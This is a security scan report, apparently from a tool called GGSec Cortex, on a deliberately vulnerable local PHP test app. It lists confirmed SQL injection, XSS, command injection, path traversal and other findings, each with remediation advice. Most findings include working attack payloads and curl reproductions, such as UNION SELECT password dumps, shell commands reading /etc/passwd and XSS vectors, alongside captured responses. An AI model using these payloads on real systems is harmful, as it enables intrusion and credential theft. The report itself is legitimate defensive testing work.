Security Assessment Report
GG Advanced IT Security  ·  ggsec.de
SAST 120.0s DAST 49.1s 87 requests 20 confirmed vulns 3 likely 30 SAST targets GGSec Cortex v0.9 Beta
F
Security
Rating

Executive Summary

GGSec Cortex identified 20 confirmed and 3 likely vulnerabilities in ggsec_test_app.php. Every confirmed finding is evidence-backed — proven by a live proof-of-concept or a baseline-difference control (a forged/malicious request is accepted while a matched control is rejected), so false positives are minimised. Immediate remediation is recommended.
💰
Business Impact
Full server compromise (remote code execution)
🧰
Exploitation Complexity
Low — reachable by a remote attacker
🎯
Likelihood
High — confirmed with a live proof-of-concept
Overall Risk
Critical · max CVSS 9.8

Assessment Scope

📄
Target
ggsec_test_app.php
🌐
Base URL
http://localhost
🔗
Endpoints tested
5
📤
Total requests
87
HTTP methods
GET, POST, POST+GET
🛡
Vulnerability classes
12
🔑
Authentication
Unauthenticated
🔎
SAST duration
120.0s
DAST duration
49.1s
📅
Scan completed
2026-07-05 15:56

Scan Timeline

15:53:54
Scan started
15:55:54
SAST analysis completed (120.0s, 30 target(s))
15:55:54
DAST probing started
15:55:54
GGC-SQLI-AEE confirmed — SQL_QUERY id
15:55:54
GGC-CSRF-72B confirmed — CSRF content
15:55:54
GGC-RCE-FAE confirmed — CODE_EXEC host
15:55:54
GGC-PATH-42C confirmed — PATH_TRAVERSAL file
15:55:54
GGC-SQLI-DE9 confirmed — SQL_QUERY view_user
15:55:54
GGC-SQLI-181 confirmed — SQL_QUERY search
15:55:54
GGC-XSS-775 confirmed — XSS hash (location.hash)
15:55:54
GGC-XXE-43C confirmed — XXE xml
15:55:54
GGC-VULN-C5F confirmed — LDAP_INJECTION user
15:55:54
GGC-VULN-431 confirmed — FILE_UPLOAD upload
15:55:54
GGC-CSRF-188 confirmed — CSRF comment
15:55:54
GGC-CSRF-39C confirmed — CSRF username
15:56:42
GGC-XSS-DEB confirmed — XSS title
15:56:42
GGC-SSTI-6EC confirmed — SSTI content
15:56:43
GGC-SQLI-845 confirmed — SQL_QUERY id
15:56:43
GGC-XSS-2E9 confirmed — XSS search
15:56:43
GGC-SQLI-620 confirmed — SQL_QUERY username
15:56:43
GGC-SQLI-733 confirmed — SQL_QUERY email
15:56:43
GGC-XSS-FCA confirmed — XSS author
15:56:43
GGC-XSS-909 confirmed — XSS comment
15:56:43
DAST probing completed (49.1s, 87 requests)
15:56:45
Report generated

Overview

20
Confirmed Vulns
3
Likely (review)
💀
11
Critical SAST
🔥
15
High SAST
💻
1
RCE
🗃
6
SQLi
5
XSS
🌐
0
SSRF
📄
1
XXE
🎭
3
CSRF
📡
0
JSONP
🔓
0
Auth Bypass
📤
87
Total Requests
Confirmed vulns by sink type DAST
SQL_QUERY: 20 XSS: 19 CODE_EXEC: 10 CSRF: 3 SSTI: 3 OUTDATED_COMPONENT: 2 PATH_TRAVERSAL: 2 XXE: 2 PII_EXPOSURE: 1 FILE_UPLOAD: 1 LDAP_INJECTION: 1 64 total
SQL_QUERY20
XSS19
CODE_EXEC10
CSRF3
SSTI3
OUTDATED_COMPONENT2
PATH_TRAVERSAL2
XXE2
SAST impact distribution SAST
SESSION_THEFT
10
RCE
8
AUTH_BYPASS
5
FILE_READ
2
PRIV_ESC
2
INFORMATION_DISCLOSURE
1
DOS
1
NONE
1
DAST hit rate by sink DAST
SQL_QUERY
20/22
XSS
19/19
CODE_EXEC
10/17
CSRF
3/3
SSTI
3/3
OUTDATED_COMPONENT
2/2
PATH_TRAVERSAL
2/5
XXE
2/4
PII_EXPOSURE
1/1
LDAP_INJECTION
1/8
FILE_UPLOAD
1/1
PROTOTYPE_POLLUTION
0/2

Risk Matrix

Likelihood ▼ / Impact ▶NegligibleMinorModerateMajorSevere
Almost certain92
Likely54
Possible
Unlikely
Rare

Remediation Plan

IDFindingCVSSPrioritySLA
GGC-VULN-431 🔍 FILE_UPLOAD upload 9.8 P0 Fix immediately
GGC-SSTI-6EC 🔍 SSTI content 9.8 P0 Fix immediately
GGC-RCE-FAE 💀 CODE_EXEC host 8.8 P1 Within 7 days
GGC-VULN-C5F 🔍 LDAP_INJECTION user 8.2 P1 Within 7 days
GGC-SQLI-733 🗃 SQL_QUERY email 8.2 P1 Within 7 days
GGC-SQLI-845 🗃 SQL_QUERY id 8.2 P1 Within 7 days
GGC-SQLI-AEE 🗃 SQL_QUERY id 8.2 P1 Within 7 days
GGC-SQLI-181 🗃 SQL_QUERY search 8.2 P1 Within 7 days
GGC-SQLI-620 🗃 SQL_QUERY username 8.2 P1 Within 7 days
GGC-SQLI-DE9 🗃 SQL_QUERY view_user 8.2 P1 Within 7 days
GGC-CSRF-188 🎭 CSRF comment 8.1 P1 Within 7 days
GGC-CSRF-39C 🎭 CSRF username 8.1 P1 Within 7 days
GGC-PATH-42C 🔍 PATH_TRAVERSAL file 7.5 P1 Within 7 days
GGC-XXE-43C 📄 XXE xml 7.5 P1 Within 7 days
GGC-CSRF-72B 🎭 CSRF content 7.3 P1 Within 7 days
GGC-XSS-FCA ⚡ XSS author 5.4 P2 Within 30 days
GGC-XSS-909 ⚡ XSS comment 5.4 P2 Within 30 days
GGC-XSS-775 ⚡ XSS hash (location.hash) 5.4 P2 Within 30 days
GGC-XSS-2E9 ⚡ XSS search 5.4 P2 Within 30 days
GGC-XSS-DEB ⚡ XSS title 5.4 P2 Within 30 days

Compliance Coverage

Each finding mapped to OWASP Top 10 2021, PCI-DSS v4.0, ISO/IEC 27001:2022 and GDPR. References are indicative for audit scoping, not a certification statement.

OWASP Top 10 (2021)# FindingsPCI-DSS v4.0ISO/IEC 27001:2022GDPR
A03:2021 – Injection 21 PCI-DSS v4.0 Req 6.2.4 (injection/XSS) ISO/IEC 27001:2022 A.8.28 GDPR Art. 32 (security of processing)
A01:2021 – Broken Access Control 4 PCI-DSS v4.0 Req 6.2.4 / 7.2.1 ISO/IEC 27001:2022 A.8.3 / A.5.15 GDPR Art. 5(1)(f) + Art. 32 (confidentiality)
A06:2021 – Vulnerable and Outdated Components 2 PCI-DSS v4.0 Req 6.3.1 / 6.3.3 (patch mgmt) ISO/IEC 27001:2022 A.8.8 GDPR Art. 32 (security of processing)
A05:2021 – Security Misconfiguration 1 PCI-DSS v4.0 Req 2.2.1 / 6.2.4 ISO/IEC 27001:2022 A.8.9 / A.8.28 GDPR Art. 32 (security of processing)
A04:2021 – Insecure Design 1 PCI-DSS v4.0 Req 6.2.4 (business-logic) ISO/IEC 27001:2022 A.8.28 / A.8.27 GDPR Art. 25 + Art. 32 (data protection by design)
A02:2021 – Cryptographic Failures 1 PCI-DSS v4.0 Req 3.4.1 / 3.5.1 ISO/IEC 27001:2022 A.5.34 / A.8.24 GDPR Art. 5(1)(f) + Art. 32 + Art. 34 (breach notification)

SAST — Attack Surface

SAST confidence = static taint-flow certainty (source→sink), not runtime proof. "Confirmed" is reserved for DAST findings the engine actually exploited.

#ParameterSinkRiskCVSSStatic confidenceExploit.ImpactLocation
1 id 🗃 SQL_QUERY Critical 9.8 CRITICAL Taint-flow Direct AUTH_BYPASS ?page=sqli_first_order
2 search ⚡ XSS High 6.1 MEDIUM Taint-flow Direct SESSION_THEFT ?page=xss_reflected
3 host 💀 CODE_EXEC Critical 9.8 CRITICAL Taint-flow Direct RCE ?page=cmd_exec
4 file 🔍 PATH_TRAVERSAL High 7.5 HIGH Taint-flow Direct FILE_READ ?page=path_traversal
5 view_user 🗃 SQL_QUERY Critical 9.8 CRITICAL Taint-flow Direct AUTH_BYPASS ?page=sqli_second_order
6 search 🗃 SQL_QUERY Critical 9.8 CRITICAL Taint-flow Chained AUTH_BYPASS ?page=sqli_second_order (second-order via search_history)
7 comment ⚡ XSS High 6.1 MEDIUM Taint-flow Chained SESSION_THEFT ?page=xss_stored
8 author ⚡ XSS High 6.1 MEDIUM Taint-flow Chained SESSION_THEFT ?page=xss_stored
9 hash (location.hash) ⚡ XSS High 6.1 MEDIUM Potential Direct SESSION_THEFT ?page=xss_dom
10 content 🔍 SSTI Critical 9.8 CRITICAL Taint-flow Chained RCE ?page=ssti
11 xml 📄 XXE Critical 7.5 HIGH Taint-flow Direct FILE_READ ?page=xxe
12 upload 🔍 FILE_UPLOAD Critical 9.8 CRITICAL Taint-flow Direct RCE ?page=file_upload_rce
13 user 🔍 LDAP_INJECTION High 8.2 HIGH Taint-flow Direct AUTH_BYPASS ?page=ldap_injection
14 pass 🔍 LDAP_INJECTION High 8.2 HIGH Taint-flow Direct AUTH_BYPASS ?page=ldap_injection
15 JSON body (__proto__/constructor) 🔍 PROTOTYPE_POLLUTION Medium 6.5 MEDIUM Potential Conditional INFORMATION_DISCLOSURE ?page=prototype_pollution
16 username 🎭 CSRF Medium 8.1 HIGH High Direct PRIV_ESC ?page=sqli_second_order (registration form)
17 comment 🎭 CSRF Medium 8.1 HIGH High Direct PRIV_ESC ?page=xss_stored (comment form)
18 content 🎭 CSRF High 8.1 HIGH High Direct RCE ?page=ssti (post creation form)
19 apache 2.4.58 · CVE-2024-38475 🔍 OUTDATED_COMPONENT Critical 9.8 CRITICAL Taint-flow Direct RCE HTTP Server / X-Powered-By banner
20 apache 2.4.58 · CVE-2024-38476 🔍 OUTDATED_COMPONENT High 7.5 HIGH Taint-flow Direct DOS HTTP Server / X-Powered-By banner
21 author ⚡ XSS High 6.1 MEDIUM Taint-flow Direct SESSION_THEFT crawl-form: ggsec_test_app.php?page=xss_stored&post_id=1
22 comment ⚡ XSS High 6.1 MEDIUM Taint-flow Direct SESSION_THEFT crawl-form: ggsec_test_app.php?page=xss_stored&post_id=1
23 email 🗃 SQL_QUERY Critical 9.8 CRITICAL Taint-flow Direct RCE crawl-form: ggsec_test_app.php?page=sqli_second_order
24 Email address 🔍 PII_EXPOSURE Low 0.0 NONE Taint-flow Direct NONE HTTP response body
25 id 🗃 SQL_QUERY Critical 9.8 CRITICAL Taint-flow Direct RCE crawl: /ggsec_test_app.php?page=sqli_first_order&id=1
26 search ⚡ XSS High 6.1 MEDIUM Taint-flow Direct SESSION_THEFT crawl: /ggsec_test_app.php?page=xss_reflected&search=test
27 title ⚡ XSS High 6.1 MEDIUM Taint-flow Direct SESSION_THEFT ggsec_test_app.php?page=ssti&render=346
28 title ⚡ XSS High 6.1 MEDIUM Taint-flow Direct SESSION_THEFT ggsec_test_app.php?page=ssti&render=347
29 title ⚡ XSS High 6.1 MEDIUM Taint-flow Direct SESSION_THEFT ggsec_test_app.php?page=ssti&render=348
30 username 🗃 SQL_QUERY Critical 9.8 CRITICAL Taint-flow Direct RCE crawl-form: ggsec_test_app.php?page=sqli_second_order

Endpoint Summary

EndpointRequestsFindingsRisk
ggsec_test_app.php 80 💀 CODE_EXEC 🎭 CSRF 🔍 LDAP_INJECTION 🔍 OUTDATED_COMPONENT 🔍 PATH_TRAVERSAL 🔍 PII_EXPOSURE 🗃 SQL_QUERY 🔍 SSTI ⚡ XSS CRITICAL
/ggsec_test_app.php 2 🗃 SQL_QUERY ⚡ XSS CRITICAL
uploads/8a62ceac0d186ffa97e3727b1685f02f_ggsec_shell.php 1 🔍 FILE_UPLOAD CRITICAL
http://localhost/ggsec_test_app.php 2 📄 XXE HIGH
/merge 2 OK

DAST — Vulnerability Details

🗃 GGC-SQLI-AEE 8.2 HIGH P1 Confirmed SQL_QUERY id ?page=sqli_first_order 10/12 hits
Flow
$_GET['id'] → getParam('id') → $id → string concatenation into "SELECT * FROM users WHERE id = " . $id → pdo->query(). No prepared statement. Error messages are echoed via PDOException->getMessage(), enabling error-based SQLi. SQLite backend.
Impact
AUTH_BYPASS — Direct
CWE / CVSS
CWE-89 SQL Injection (SQLite backend)  ·  CVSS 8.2 High
SQL is built from untrusted input, letting an attacker alter the query to read/modify data or bypass authentication.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:H/RC:C
ⓘ SQLite backend — impact bounded to DB read / limited write (no stacked queries, xp_cmdshell, LOAD_FILE, or host/network pivot).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS)  ·  ISO/IEC 27001:2022 A.8.28  ·  GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1190 Exploit Public-Facing Application
Initial Access
Certainty / Access
Confirmed  ·  🔓 Unauthenticated
Confidence & Evidence
96%High confidenceEvidence score 96/100
  • +50 Confirmed (strong signal)
  • +20 Direct detection (sql-error-body)
  • +15 Damning token in response ("SQLSTATE")
  • +6 Reproduced by 10 payload(s)
  • +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i 'ggsec_test_app.php?page=sqli_first_order&id=1%22'
Reflection @ offset 101 — via sql-error-body:
…ROM users WHERE id = 1&quot;</p><p style='color:red'>Error: SQLSTATE[HY000]: General error: 1 unrecognized token: """</p>
Evidence (live response):
…<p>Query: SELECT * FROM users WHERE id = 1&quot;</p><p style='color:red'>Error: SQLSTATE[HY000]: General error: 1 unrecognized token: """</p>
Remediation
Use parameterized queries / prepared statements — never build queries by string concatenation.
  • Replace interpolated SQL with bound parameters (PDO/mysqli prepared statements, '?'/named placeholders).
  • For NoSQL, cast user input to the expected scalar type and reject array/operator inputs ((string)$x, type checks).
  • Apply least-privilege DB credentials; the web user should not own DDL or admin rights.
  • Add allowlist validation for structural elements that cannot be parameterized (column/table names, ORDER BY).
Refs: CWE-89 · OWASP: SQL Injection Prevention Cheat Sheet · CWE-943 (NoSQL)
ResultMethodURLPayloadStatusTimeDetectionDB
✓ OK GET ggsec_test_app.php?page=sqli_first_order&id=1%20OR%201%3D1
1 OR 1=1
200 23ms
⚠ VULN GET ggsec_test_app.php?page=sqli_first_order&id=0%20UNION%20SELECT%20usernam…
0 UNION SELECT username,email,password,role,profile_data,search_history FROM users--
200 26ms sql-error-body SQLite
⚠ VULN GET ggsec_test_app.php?page=sqli_first_order&id=0%20UNION%20SELECT%20usernam…
0 UNION SELECT username,password,role,4,5,6 FROM users--
200 22ms sql-error-body SQLite
⚠ VULN GET ggsec_test_app.php?page=sqli_first_order&id=1%20AND%201%3D2%20UNION%20SE…
1 AND 1=2 UNION SELECT 1,2,3,4,5,6--
200 2ms sql-error-body SQLite
✓ OK GET ggsec_test_app.php?page=sqli_first_order&id=1%20AND%20%28SELECT%20CASE%2…
1 AND (SELECT CASE WHEN (1=1) THEN RANDOMBLOB(500000000) ELSE 1 END)
200 2031ms
⚠ VULN GET ggsec_test_app.php?page=sqli_first_order&id=1%20AND%201%3D1%20AND%20LIKE…
1 AND 1=1 AND LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000))))
200 1628ms sql-error-body
⚠ VULN GET ggsec_test_app.php?page=sqli_first_order&id=1%27
1'
200 2ms sql-error-body SQLite
⚠ VULN GET ggsec_test_app.php?page=sqli_first_order&id=1%22
1"
200 2ms sql-error-body SQLite
⚠ VULN GET ggsec_test_app.php?page=sqli_first_order&id=1%20AND%20CAST%28username%20…
1 AND CAST(username AS INT) FROM users--
200 2ms sql-error-body SQLite
GGC-XSS-E80 5.4 MEDIUM P2 Confirmed XSS search ?page=xss_reflected 6/6 hits
Flow
$_GET['search'] → getParam('search') → $search → directly echoed into HTML body ("You searched for: " . $search), into an HTML attribute (value='$search'), and into a JavaScript string context (var lastSearch = '$search'). No htmlspecialchars or encoding applied in any of the three contexts.
Impact
SESSION_THEFT — Direct
CWE / CVSS
CWE-79 Cross-site Scripting  ·  CVSS 5.4 Medium (Base 6.1 Medium)
Untrusted input is reflected into a page without encoding, so attacker script runs in the victim's browser (session theft).
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N/E:H/RC:C
ⓘ Base 6,1 → Effective 5,4 — auth-gated (PR:L).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS)  ·  ISO/IEC 27001:2022 A.8.28  ·  GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1059.007 Command and Scripting Interpreter: JavaScript · T1185 Browser Session Hijacking
Execution, Collection
Certainty / Access
Confirmed  ·  👤 Customer
Confidence & Evidence
81%Medium confidenceEvidence score 81/100
  • +50 Confirmed (strong signal)
  • +20 Direct detection (indicator)
  • +6 Reproduced by 6 payload(s)
  • +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i 'ggsec_test_app.php?page=xss_reflected&search=%3Csvg%20onload%3Dalert%28%27XSS%27%29%3E'
Reflection @ offset 44 — reflected UNENCODED (executes):
<h2>Search Results</h2><p>You searched for: <svg onload=alert('XSS')></p><input type='hidden' name='q' value='<svg onload=alert('…
Evidence (live response):
…lert('XSS')></p><input type='hidden' name='q' value='<svg onload=alert('XSS')>'><script>var lastSearch = '<svg onload=alert('XSS')>';</script>
Remediation
Apply context-aware output encoding on every place user data reaches HTML/JS, and add a CSP.
  • Encode on output by context: HTML body (htmlspecialchars/escapeHTML), attributes, JS, URL.
  • Prefer auto-escaping template engines; avoid raw echo/print of tainted data.
  • Deploy a strict Content-Security-Policy and set HttpOnly on session cookies.
Refs: CWE-79 · OWASP: XSS Prevention Cheat Sheet
ResultMethodURLPayloadStatusTimeDetectionDB
⚠ VULN GET ggsec_test_app.php?page=xss_reflected&search=%3Cscript%3Ealert%28%27XSS%…
<script>alert('XSS')</script>
200 2ms indicator
⚠ VULN GET ggsec_test_app.php?page=xss_reflected&search=%3Cimg%20src%3Dx%20onerror%…
<img src=x onerror=alert('XSS')>
200 2ms indicator
⚠ VULN GET ggsec_test_app.php?page=xss_reflected&search=%3Csvg%20onload%3Dalert%28%…
<svg onload=alert('XSS')>
200 21ms indicator
⚠ VULN GET ggsec_test_app.php?page=xss_reflected&search=%27%3Balert%28%27XSS%27%29%…
';alert('XSS');//
200 11ms xss-reflection
⚠ VULN GET ggsec_test_app.php?page=xss_reflected&search=%27%20onfocus%3Dalert%28%27…
' onfocus=alert('XSS') autofocus='
200 11ms xss-reflection
⚠ VULN GET ggsec_test_app.php?page=xss_reflected&search=%22%3E%3Cscript%3Ealert%28%…
"><script>alert('XSS')</script>
200 2ms indicator
💀 GGC-RCE-FAE 8.8 HIGH P1 Confirmed CODE_EXEC host ?page=cmd_exec 10/17 hits
Flow
$_GET['host'] → getParam('host') → $host → string concatenation into "ping -c 1 " . $host → shell_exec(). No escapeshellarg() or whitelist. Full command injection via shell metacharacters.
Impact
RCE — Direct
CWE / CVSS
CWE-94 Code Injection  ·  CVSS 8.8 High (Base 9.8 Critical)
Untrusted input reaches a code interpreter (eval/include), allowing arbitrary code execution on the server.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:H/RC:C
ⓘ Base 9,8 → Effective 8,8 — auth-gated (PR:L).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS)  ·  ISO/IEC 27001:2022 A.8.28  ·  GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1190 Exploit Public-Facing Application · T1059 Command and Scripting Interpreter
Initial Access, Execution
Certainty / Access
Confirmed  ·  👤 Customer
Confidence & Evidence
96%High confidenceEvidence score 96/100
  • +50 Confirmed (strong signal)
  • +20 Direct detection (default-indicator)
  • +15 Damning token in response ("www-data")
  • +6 Reproduced by 10 payload(s)
  • +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i 'ggsec_test_app.php?page=cmd_exec&host=%26%20whoami'
Reflection @ offset 73 — via default-indicator:
…iagnostics</h2><p>Executing: ping -c 1 &amp; whoami</p><pre>www-data </pre>
Evidence (live response):
<h2>Network Diagnostics</h2><p>Executing: ping -c 1 &amp; whoami</p><pre>www-data </pre>
Remediation
Never pass user input to eval/system/shell — use safe APIs, allowlists, and argument escaping.
  • Eliminate eval() and dynamic code execution on tainted input entirely.
  • For OS commands, use array/exec APIs that bypass the shell; escape with escapeshellarg if unavoidable.
  • Validate input against a strict allowlist (e.g. a known set of hostnames/IDs).
  • Run the service under a low-privilege account.
Refs: CWE-94 · CWE-78 · OWASP: OS Command Injection Defense Cheat Sheet
ResultMethodURLPayloadStatusTimeDetectionDB
⚠ VULN GET ggsec_test_app.php?page=cmd_exec&host=%3B%20id
; id
200 11ms indicator
✓ OK GET ggsec_test_app.php?page=cmd_exec&host=%24%28id%29
$(id)
200 10ms
✓ OK GET ggsec_test_app.php?page=cmd_exec&host=%60id%60
`id`
200 8ms
⚠ VULN GET ggsec_test_app.php?page=cmd_exec&host=%3B%20cat%20%2Fetc%2Fpasswd
; cat /etc/passwd
200 10ms indicator
⚠ VULN GET ggsec_test_app.php?page=cmd_exec&host=%3B%20id%20%23
; id #
200 7ms indicator
⚠ VULN GET ggsec_test_app.php?page=cmd_exec&host=127.0.0.1%3B%20id
127.0.0.1; id
200 7ms indicator
⚠ VULN GET ggsec_test_app.php?page=cmd_exec&host=%26%20whoami
& whoami
200 7ms default-indicator
⚠ VULN GET ggsec_test_app.php?page=cmd_exec&host=%7C%20whoami
| whoami
200 6ms default-indicator
✓ OK GET ggsec_test_app.php?page=cmd_exec&host=%26%26%20whoami
&& whoami
200 5ms
✓ OK GET ggsec_test_app.php?page=cmd_exec&host=%26%20dir%20C%3A%5C%20%26
& dir C:\ &
200 9ms
⚠ VULN GET ggsec_test_app.php?page=cmd_exec&host=%3B%20sleep%205
; sleep 5
200 4989ms time-based
⚠ VULN GET ggsec_test_app.php?page=cmd_exec&host=%3B%20sleep%205%20%23
; sleep 5 #
200 5002ms time-based
⚠ VULN GET ggsec_test_app.php?page=cmd_exec&host=%24%28sleep%205%29
$(sleep 5)
200 5012ms time-based
⚠ VULN GET ggsec_test_app.php?page=cmd_exec&host=%3B%20ping%20-c%205%20127.0.0.1
; ping -c 5 127.0.0.1
200 4102ms time-based-rce
✓ OK GET ggsec_test_app.php?page=cmd_exec&host=%26%20timeout%20%2Ft%205%20%26
& timeout /t 5 &
200 5ms
✓ OK GET ggsec_test_app.php?page=cmd_exec&host=%3B%20timeout%20%2Ft%205
; timeout /t 5
200 5ms
✓ OK GET ggsec_test_app.php?page=cmd_exec
& ping -n 5 127.0.0.1 &
0 25014ms
🔍 GGC-PATH-42C 7.5 HIGH P1 Confirmed PATH_TRAVERSAL file ?page=path_traversal 2/5 hits
Flow
$_GET['file'] → getParam('file') → $file → concatenation with $basePath (__DIR__ . '/files/') → file_get_contents($target). No realpath() validation, no basename() stripping, no directory confinement check. Classic directory traversal via ../ sequences.
Impact
FILE_READ — Direct
CWE / CVSS
CWE-22 Path Traversal / Arbitrary File Read  ·  CVSS 7.5 High
User-controlled path components escape the intended directory, exposing arbitrary files (/etc/passwd, config, source).
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:H/RC:C
Compliance Impact
A01:2021 – Broken Access Control
PCI-DSS v4.0 Req 6.2.4 / 7.2.1  ·  ISO/IEC 27001:2022 A.8.3 / A.5.15  ·  GDPR Art. 5(1)(f) + Art. 32 (confidentiality)
MITRE ATT&CK
T1083 File and Directory Discovery · T1005 Data from Local System
Discovery, Collection
Certainty / Access
Confirmed  ·  🔓 Unauthenticated
Confidence & Evidence
92%High confidenceEvidence score 92/100
  • +50 Confirmed (strong signal)
  • +20 Direct detection (indicator)
  • +15 Damning token in response ("root:x:0:0")
  • +2 Reproduced by 2 payload(s)
  • +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i 'ggsec_test_app.php?page=path_traversal&file=..%2F..%2F..%2F..%2Fetc%2Fpasswd'
Reflection @ offset 52 — via indicator:
<h2>File Viewer</h2><p>Reading: /var/www/html/files/../../../../etc/passwd</p><pre>root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon…
Evidence (live response):
…>File Viewer</h2><p>Reading: /var/www/html/files/../../../../etc/passwd</p><pre>root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:6…
Remediation
Never build filesystem paths from user input — map requests to a fixed allowlist and canonicalize before use.
  • Map the user-supplied identifier to a server-side allowlist of permitted files; never use it as a path directly.
  • Canonicalize the resolved path (realpath) and verify it is still inside the intended base directory before reading.
  • Reject traversal sequences AFTER decoding (../, ..\, encoded %2e%2e, and stripped variants like ....//).
  • Run with least privilege so sensitive files (/etc/passwd, app secrets) are unreadable by the web user.
Refs: CWE-22 · CWE-73 · OWASP: Path Traversal · OWASP: File Path Traversal Prevention Cheat Sheet
ResultMethodURLPayloadStatusTimeDetectionDB
✓ OK GET ggsec_test_app.php?page=path_traversal&file=..%2F..%2F..%2Fetc%2Fpasswd
../../../etc/passwd
200 5ms
⚠ VULN GET ggsec_test_app.php?page=path_traversal&file=..%2F..%2F..%2F..%2Fetc%2Fpa…
../../../../etc/passwd
200 2ms indicator
⚠ VULN GET ggsec_test_app.php?page=path_traversal&file=..%2F..%2F..%2F..%2F..%2Fetc…
../../../../../etc/passwd
200 2ms indicator
✓ OK GET ggsec_test_app.php?page=path_traversal&file=..%252F..%252F..%252Fetc%252…
..%2F..%2F..%2Fetc%2Fpasswd
200 2ms
✓ OK GET ggsec_test_app.php?page=path_traversal&file=....%2F%2F....%2F%2F....%2F%…
....//....//....//etc/passwd
200 2ms
🗃 GGC-SQLI-DE9 8.2 HIGH P1 Confirmed SQL_QUERY view_user ?page=sqli_second_order 4/4 hits
Flow
$_GET['view_user'] → getParam('view_user') → $userId → string concatenation into "SELECT * FROM users WHERE id = " . $userId → pdo->query(). First-order SQLi on the view_user parameter (direct interpolation, no prepared statement).
Impact
AUTH_BYPASS — Direct
CWE / CVSS
CWE-89 SQL Injection (SQLite backend)  ·  CVSS 8.2 High
SQL is built from untrusted input, letting an attacker alter the query to read/modify data or bypass authentication.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:H/RC:C
ⓘ SQLite backend — impact bounded to DB read / limited write (no stacked queries, xp_cmdshell, LOAD_FILE, or host/network pivot).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS)  ·  ISO/IEC 27001:2022 A.8.28  ·  GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1190 Exploit Public-Facing Application
Initial Access
Certainty / Access
Confirmed  ·  🔓 Unauthenticated
Confidence & Evidence
94%High confidenceEvidence score 94/100
  • +50 Confirmed (strong signal)
  • +20 Direct detection (sql-error-body)
  • +15 Damning token in response ("SQLSTATE")
  • +4 Reproduced by 4 payload(s)
  • +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i 'ggsec_test_app.php?page=sqli_second_order&view_user=1%20OR%201%3D1'
Reflection @ offset 3924 — via sql-error-body:
…&#039; OR SLEEP(5)--|%&#039;</p><p style='color:red'>Error: SQLSTATE[HY000]: General error: 1 SELECTs to the left and right of U…
Evidence (live response):
…4 FROM posts--|admin&#039; OR SLEEP(5)--|%&#039;</p><p style='color:red'>Error: SQLSTATE[HY000]: General error: 1 SELECTs to the left and right of UNION do not have the same number of result columns</p><form method='POST'>         <input name='username' placeholder='Username'>…
Remediation
Use parameterized queries / prepared statements — never build queries by string concatenation.
  • Replace interpolated SQL with bound parameters (PDO/mysqli prepared statements, '?'/named placeholders).
  • For NoSQL, cast user input to the expected scalar type and reject array/operator inputs ((string)$x, type checks).
  • Apply least-privilege DB credentials; the web user should not own DDL or admin rights.
  • Add allowlist validation for structural elements that cannot be parameterized (column/table names, ORDER BY).
Refs: CWE-89 · OWASP: SQL Injection Prevention Cheat Sheet · CWE-943 (NoSQL)
ResultMethodURLPayloadStatusTimeDetectionDB
⚠ VULN GET ggsec_test_app.php?page=sqli_second_order&view_user=1%27
1'
200 2ms sql-error-body SQLite
⚠ VULN GET ggsec_test_app.php?page=sqli_second_order&view_user=1%20OR%201%3D1
1 OR 1=1
200 2ms sql-error-body SQLite
⚠ VULN GET ggsec_test_app.php?page=sqli_second_order&view_user=0%20UNION%20SELECT%2…
0 UNION SELECT username,email,password,role,profile_data,search_history FROM users--
200 2ms sql-error-body SQLite
🗃 GGC-SQLI-181 8.2 HIGH P1 Confirmed SQL_QUERY search ?page=sqli_second_order (second-order via search_history) 3/3 hits
Flow
$_GET['search'] → stored into users.search_history via parameterized UPDATE (safe store) → later retrieved from DB via SELECT (using interpolated $userId) → $history → string concatenation into "SELECT * FROM posts WHERE title LIKE '%" . $history . "%'" → pdo->query(). Second-order SQLi: tainted search term persists in DB and is later interpolated into a query without sanitization.
Attack Chain
Step 1: Send GET ?page=sqli_second_order&view_user=1&search=PAYLOAD to store malicious search_history. Step 2: Send GET ?page=sqli_second_order&view_user=1 to trigger the second query that interpolates the stored history.
Impact
AUTH_BYPASS — Chained
CWE / CVSS
CWE-89 SQL Injection (SQLite backend)  ·  CVSS 8.2 High
SQL is built from untrusted input, letting an attacker alter the query to read/modify data or bypass authentication.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:H/RC:C
ⓘ SQLite backend — impact bounded to DB read / limited write (no stacked queries, xp_cmdshell, LOAD_FILE, or host/network pivot).
Compliance Impact
A03:2021 – Injection
PCI-DSS v4.0 Req 6.2.4 (injection/XSS)  ·  ISO/IEC 27001:2022 A.8.28  ·  GDPR Art. 32 (security of processing)
MITRE ATT&CK
T1190 Exploit Public-Facing Application
Initial Access
Certainty / Access
Confirmed  ·  🔓 Unauthenticated
Confidence & Evidence
93%High confidenceEvidence score 93/100
  • +50 Confirmed (strong signal)
  • +20 Direct detection (sql-error-body)
  • +15 Damning token in response ("SQLSTATE")
  • +3 Reproduced by 3 payload(s)
  • +5 Stable 2xx response
Proof of Concept
Reproduce:
curl -i 'ggsec_test_app.php?page=sqli_second_order&view_user=1&search=%27%20UNION%20SELECT%201%2C2%2C3%2C4%2C5--'
